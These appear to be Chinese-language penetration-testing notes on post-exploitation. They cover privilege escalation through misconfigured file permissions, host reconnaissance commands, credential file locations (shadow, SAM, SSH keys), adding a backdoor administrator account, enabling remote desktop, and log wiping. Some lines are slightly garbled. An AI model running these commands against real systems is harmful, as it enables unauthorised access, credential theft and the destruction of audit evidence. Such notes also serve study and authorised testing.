利用配置不当提权(不是很现实 实用)
与漏洞提权相比 更常用的方法,企业环境补丁更新的全部已经安装,输入变量过滤之外更值得研发关注的安全隐患
条件:
查找以system权限启动,NTFS权限允许users修改删除
windos
icacls(2003之后的系统自带、vista、win71.8> uname -a #查看主机信息等)
icacls c:\windows*.exe /save perm /T
bu普通用户权限
查找特征FA;;;BU 普通用户有所有执行权限后,将该程序执行程序伪装改为提权脚本,使用快捷方式的时候就会执行提权脚本从而提权
i586-mingw32msvc-gcc -o admin.exe admin.c (编译成exe文件工具)
linux
Find
find / -perm 777 -exec ls -l {} \
收集敏感信息
linux基本信息
1.1> cat /etc/resolv.conf #查看DNS的配置文件
1.2> cat /etc/passwd #查看密码文件(所有人都可以看)
1.3> cat /etc/shadow #查看密码文件(root可看)
1.4> whoami #查看当前登录的用户
1.5> ifconfig -a #查看所有网卡的信息
1.6> iptables -L -n #查看防火墙策略
1.7> netstat -nr #查看网关及路由信息
1.8> uname -a #查看主机信息
1.9> ps aux #查看所有运行的进程信息
1.10>dpkg -l #查看当前系统中的软件包
linux敏感信息
/etc;/usr/local/etc;
/etc/、/usr/local/etc # 配置文件放置目录
/etc/passwd、/etc/shadow #账号密码
.ssh .gnupg 公私钥 #linux以.为首的目录/文件都是隐藏的
业务数据库 ;身份认证服务器数据库
/tmp #linux中的临时目录,存放临时数据有可能泄露机密数据
linux痕迹擦除
1.1> cat /root/.bash_history #查看历史消息文件
1.2> history -c #清除历史记录
1.3> cat /var/log/auth.log #日志信息
1.4> file /var/log/btmp #错误登录日志
1.5> file /var/log/lastlog #最后一次登录的时间
1.6> file /var/log/filelog #登录失败的日志
windos基本信息
2.1> ipconfig /all #查看网卡的信息
2.2> ipconfig /displaydns #查看dns缓存
2.3> netstat -bnao #查看开放的端口及进程
2.4> netstat -r #查看路由信息
2.5> net view #查看共享资源列表
2.6> net view /domain #查看域中的共享资源列表
2.7> net share #查看共享资源列表
2.8> net accounts #查看当前设置,密码要求,服务器角色
2.9>net user yxz yxz /add #新建用户
2.10> net localgroup administrators yxz /add #将新建的用户添加到管理员组
使用wmic工具
3.1> wmic nicconfig get ipaddress,macaddress #获取本机IP地址和MAC地址
3.2> wmic computersystem get username #获取计算机系统的用户名
3.3> wmic netlogin get name,lastlogon #获取用户最近一次的登录时间
3.4> wmic process get caption,executablepath,commandline #获取服务名称,路径及运行方式
3.5> wmic process where name='calc.exe' call terminate #关闭计算机进程
3.6> wmic os get name,servicepackmajorversion #获取服务及对应数据包的版本
3.7> wmic os get name,version #获取软件的版本信息
3.8> wmic share get /all #获取软件的共享信息
3.9>wmic /node:localhost path win32_TerminalServiceSetting where AllowTsConnections="0" call SetAllowTsConnections "1" #远程设置更改
3.10> wmic nteventlog get path,filename,writeable #查看能修改删除的日志
windos敏感信息
SAM数据库;注册表文件
%SYSTEMROOT%\repair\SAM #SAM进行修复操作时,保存SAM副本
%SYSTEMROOT%\System32\config\RegBack\SAM #注册表备份
业务数据库 ; 身份认证数据库
临时文件目录 #病毒经常驻留的地方
UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\
windos痕迹擦除
del %WINDIR%\*.log /a/s/q/f